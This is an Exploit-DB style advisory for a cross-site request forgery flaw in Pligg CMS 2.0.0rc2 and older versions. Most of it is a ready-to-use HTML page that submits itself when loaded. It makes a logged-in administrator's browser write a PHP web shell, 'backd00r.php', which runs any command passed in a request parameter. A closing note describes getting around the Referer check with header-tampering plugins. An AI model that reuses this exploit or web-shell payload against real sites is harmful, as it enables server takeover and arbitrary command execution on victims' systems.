24 lines
No EOL
917 B
Text
24 lines
No EOL
917 B
Text
---------------------------------------------------
|
|
# Exploit Title: Pligg CMS - CSRF Vulnerability
|
|
# Author: DaOne
|
|
# Vendor Homepage: http://pligg.com/
|
|
# Download link: https://github.com/Pligg/pligg-cms/archive/2.0.0rc2.zip
|
|
# Category: webapps/php
|
|
# Version: 2.0.0rc2 + old versions
|
|
---------------------------------------------------
|
|
|
|
-Create File by CSRF Exploit-
|
|
<html>
|
|
<body onload="document.form.submit();">
|
|
<form action="http://[target]/pligg/admin/admin_editor.php" method="post" name="form">
|
|
<input type="hidden" name="updatedfile" value="<?php system($_REQUEST['cmd']); ?>">
|
|
<input type="hidden" name="the_file2" value="/var/www/html/pligg/backd00r.php">
|
|
<input type="hidden" name="isempty" value="1">
|
|
<input type="hidden" name="save" value="Save+Changes">
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
# Exploit-DB Note:
|
|
# If getting a Wrong Referrer error, use Live HTTP Headers or Tamper Date plugin
|
|
# to mitigate the issue. |